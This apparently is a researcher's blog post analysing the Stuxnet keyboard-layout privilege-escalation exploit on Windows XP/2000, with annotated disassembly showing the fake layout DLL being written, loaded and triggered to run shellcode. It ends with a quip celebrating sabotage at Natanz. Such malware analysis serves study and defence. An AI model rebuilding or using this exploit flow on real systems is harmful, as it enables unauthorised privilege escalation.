o inaugurate 2011 I decided to release the exploit code for one of the EoP vulnerabilities exploited by Stuxnet. Stuxnet. What else could we say? It was the best gift of 2010. Stuxnet used this flaw to escalate privileges in XP/2K boxes. It's stored in the resource 250, xored, can you guess the key? ;)
After performing several paranoid checks to avoid unsuccessful exploitation ( elaborated by VUPEN), the party starts...
The vulnerability has been already explained so just a couple of notes Resource250.dll
.text:10001082 test si, si
.text:10001085 jnz short loc_100010A9
.text:10001087 push [ebp+var_4]
.text:1000108A lea eax, [ebp+var_44]
.text:1000108D push eax
.text:1000108E call GoGoGo
Stuxnet creates a temporary file and writes into it a minimalistic fake Keyboard Layout dll built up to be swallowed by win32k!ReadLayoutFile without problems.
.text:10001FC6 loc_10001FC6: ; CODE XREF: CreateFakeKbdLayoutFile+CFj
.text:10001FC6 push ebx
.text:10001FC7 lea eax, [ebp+var_4]
.text:10001FCA push eax
.text:10001FCB push 246h
.text:10001FD0 push offset unk_1000B058; fake Keyboard Layout Dll
.text:10001FD5 push esi
.text:10001FD6 call WriteFile
Then it is ready to trigger the vuln and execute the shellcode
.text:10002A63 push [ebp+var_8]
.text:10002A66 push edi
.text:10002A67 push esi
.text:10002A68 push [ebp+arg_0]
.text:10002A6B push [ebp+var_4]
.text:10002A6E call TriggerVuln
...
.text:100027F3 push 101h
.text:100027F8 push [ebp+var_8]
.text:100027FB push eax
.text:100027FC push [ebp+var_4]
.text:100027FF push 1AE0160h
.text:10002804 push [ebp+arg_10]
.text:10002807 call LoadFakeKBDviaNtUserLoadKeyboardLayoutEx
Finally
.text:10002839 push 1Ch
.text:1000283B lea eax, [ebp+var_50]
.text:1000283E push eax
.text:1000283F push ebx
.text:10002840 mov [edi+38h], esi
.text:10002843 call SendInput
At this point the shellcode is being executed. Everytime this code is executed God breaks something in Natanz.